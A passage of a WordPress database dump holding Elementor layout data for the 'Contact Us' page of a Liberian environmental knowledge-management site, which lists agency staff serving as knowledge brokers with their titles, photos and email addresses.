":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23161,3351,'_wp_attached_file','2021/01/golafale.png'),(23162,3351,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:20:\"2021/01/golafale.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"golafale-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"golafale-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23163,3352,'_elementor_edit_mode','builder'),(23164,3352,'_elementor_template_type','wp-page'),(23165,3352,'_elementor_version','3.0.16'),(23166,3352,'_wp_page_template','default'),(23167,3352,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a 